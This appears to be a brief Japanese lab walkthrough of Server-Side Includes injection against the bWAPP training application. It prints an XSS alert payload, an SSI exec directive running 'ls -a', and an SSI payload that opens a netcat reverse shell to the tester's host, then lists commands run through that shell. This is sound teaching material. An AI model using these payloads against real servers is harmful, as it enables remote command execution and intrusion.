Hello there, ('ω')ノ
Server-Side Includes攻撃により、HTMLページにスクリプトを挿入したり。
任意のコードをリモートで実行したりして。
Webアプリケーションを悪用することができて。
攻撃者は、パスワードファイルなどの機密情報にアクセスして。
シェルコマンドを実行する可能性があって。
SSIディレクティブは入力フィールドに挿入され、Webサーバに送信されるので。
まずは、動作確認をするために下記を入力して。
abc/xyz
入力された文字が反映されて。
次にXSSの検証を。
<script>alert(1)</script>/xyz
XSSの脆弱性があるようで。
XSSのペイロードはhtmlコードで確認できて。
次にexecディレクティブを使用してみると。
abc<!--#exec cmd="ls -a" -->/xyz
パラメータとしてcmdを使用してサーバーサイドのコマンドを実行できて。
サーバ内のディレクトリが表示されて。
netcatを使用してリモートシェルにアクセスして逆接続を確立できたりと。
まずは、Parrot OSのターミナルを開いてポート4444でnetcatリスナーを起動して。
nc -nlvp 4444
下記のペイロードを入力して。
<!--#exec cmd="nc 192.168.0.16 4444 -e /bin/bash" -->/xyz
Parrot OSのターミナルを確認するとbWAPPと接続できたようで。
netcatシェルを介した逆接続ができたわけで。
これは、Webアプリケーションサーバがハッキングされて侵入できることを意味して。
なので、下記のコマンドが実行できるわけで。
id
pwd
whoami
ls
Best regards, (^^ゞ